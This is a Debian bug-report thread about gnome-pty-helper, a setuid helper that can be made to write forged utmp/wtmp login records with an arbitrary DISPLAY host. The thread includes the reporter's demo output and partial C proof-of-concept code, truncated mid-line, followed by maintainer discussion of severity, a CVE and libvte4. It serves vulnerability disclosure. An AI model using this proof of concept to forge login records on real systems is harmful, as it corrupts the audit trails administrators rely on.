Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
tags 329156 + upstream security forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312 clone 329156 -1 reassign -1 libvte4 thanks [ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ] Hi, On Tue, Sep 20, 2005, Paul Szabo wrote: gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings. I am not sure if it can be tricked into erasing existing records. This vulnerability is identified as CAN-2005-0023. The upstream developers of vte have been notified of the bug at: http://bugzilla.gnome.org/show_bug.cgi?id=317312 Bye, -- Loïc Minier [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Hi, On Tue, Sep 20, 2005, Paul Szabo wrote: gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings. I am not sure if it can be tricked into erasing existing records. Thanks for your report. Do you have a CVE ID for this security issue? Did you check whether libvte4 is affected? Do you have a fix? Thanks, -- Loïc Minier [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Dear Loic, Do you have a CVE ID for this security issue? No. Sorry, I do not know how to get one. (Nor am sure if this is serious enough to deserve one.) Did you check whether libvte4 is affected? No. Do not know what libvte4 is. Do you have a fix? No. (Fanciful idea: try running xhost, if it fails then surely you do not own that display. Slow, maybe secure. That is what I use now.) Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
On Mon, Sep 26, 2005, Paul Szabo wrote: No. Sorry, I do not know how to get one. (Nor am sure if this is serious enough to deserve one.) Then I'll see whether it deserves one, and attempt to request one. Did you check whether libvte4 is affected? No. Do not know what libvte4 is. libvte4 is the GNOME 2 zquivalent of libzvt2, you can grab it from: http://packages.debian.org/ the source package for this library is vte. I'd be nice if you could check whether the gnome-pty-helper shipped in libvte4 is affected too. Let me know if you don't have a setup permitting the check, or if you lack the time. Bye, -- Loïc Minier [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Dear Loic, Did you check whether libvte4 is affected? No. Do not know what libvte4 is. libvte4 is the GNOME 2 zquivalent of libzvt2 ... I'd be nice if you could check whether the gnome-pty-helper shipped in libvte4 is affected too. Let me know if you don't have a setup permitting the check, or if you lack the time. Looking at the source vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c in line 682 it grabs display_name = getenv (DISPLAY); and uses it without any sanity checks: yes, surely it is also affected. Cheers, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole
gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.
Demo output, code below.
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
OUTPUT:
[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz sleep 1; who; ps aux | grep
psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2Sep 20 08:40 (xyz)
psz pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ?S08:14 0:00 xterm -T [EMAIL
PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz 31444 0.0 0.0 1484 380 pts/1S08:21 0:00
gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1S08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1R+ 08:21 0:00 ps aux
[1]+ Donegnome-pty-helper-exploit xyz
psz pts/1Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
CODE:
/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code stolen from subshell.c .
*/
#include sys/types.h
#include subshell-includes.h
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4
/* Pid of the helper SUID process */
static pid_t helper_pid;
/* The socketpair used for the protocol */
int helper_socket_protocol [2];
/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];
#include sys/socket.h
#include sys/uio.h
static struct cmsghdr *cmptr;
#define CONTROLLEN sizeof (struct cmsghdr) + sizeof (int)
static int
receive_fd (int helper_fd)
{
struct iovec iov [1];
struct msghdr msg;
char buf [32];
iov [0].iov_base = buf;
iov [0].iov_len = sizeof (buf);
msg.msg_iov = iov;
msg.msg_iovlen = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
if (cmptr == NULL (cmptr = malloc (CONTROLLEN)) == NULL)
return -1;
msg.msg_control = (caddr_t) cmptr;
msg.msg_controllen = CONTROLLEN;
if (recvmsg (helper_fd, msg, 0) = 0)
return -1;
return *(int *) CMSG_DATA (cmptr);
}
static int
s_pipe (int fd [2])
{
return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}
static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
GnomePtyOps op;
int result, n;
void *tag;
if (helper_pid == -1)
return NULL;
if (helper_pid == 0){
if (s_pipe (helper_socket_protocol) == -1)
return NULL;
if (s_pipe (helper_socket_fdpassing) == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
return NULL;
}
helper_pid = fork ();
if (helper_pid == -1){
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
return NULL;
}
if (helper_pid == 0){
close (0);
close (1);
dup2 (helper_socket_protocol [1], 0);
dup2 (helper_socket_fdpassing [1], 1);
/* Close aliases */
close (helper_socket_protocol [0]);
close (helper_socket_protocol [1]);
close (helper_socket_fdpassing [0]);
close (helper_socket_fdpassing [1]);
execl (/usr/sbin/gnome-pty-helper,
gnome-pty-helper, NULL);
exit (1);
} else {
close (helper_socket_fdpassing [1]);
close (helper_socket_protocol [1]);
/*
* Set the close-on-exec flag for the other
* descriptors, these should never propagate
* (otherwise gnome-pty-heler wont notice when
* this process is killed).
*/
fcntl
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote: Package: libzvt2 Version: 1.4.2-19 Severity: critical File: /usr/sbin/gnome-pty-helper Justification: root security hole gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings. I am not sure if it can be tricked into erasing existing records. Why is this filed at severity: critical? What is the attack vector here which permits root privilege escalation? -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Steve, gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings. I am not sure if it can be tricked into erasing existing records. Why is this filed at severity: critical? What is the attack vector here which permits root privilege escalation? I do not know any root escalation methods. When using reportbug, those options seemed to fit best, apologies if they were not; please change if appropriate. (For future reference: which options should I have used instead?) (In fact cannot think of any attacks: cannot think of any important uses of utmp/wtmp files. I use utmp in some of my own scripts, that is how I looked at gnome-tty-helper.) Cheers, Paul Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote: gnome-pty-helper can be made to write utmp/wtmp records with arbitrary DISPLAY (host) settings. I am not sure if it can be tricked into erasing existing records. Why is this filed at severity: critical? What is the attack vector here which permits root privilege escalation? I do not know any root escalation methods. When using reportbug, those options seemed to fit best, apologies if they were not; please change if appropriate. (For future reference: which options should I have used instead?) Hmm... After rereading the definition at http://www.debian.org/Bugs/Developer#severities, I guess there's no reason for this bug to not fall under the description of 'critical', since the security hole is present just from the installation of the package. Cheers, -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
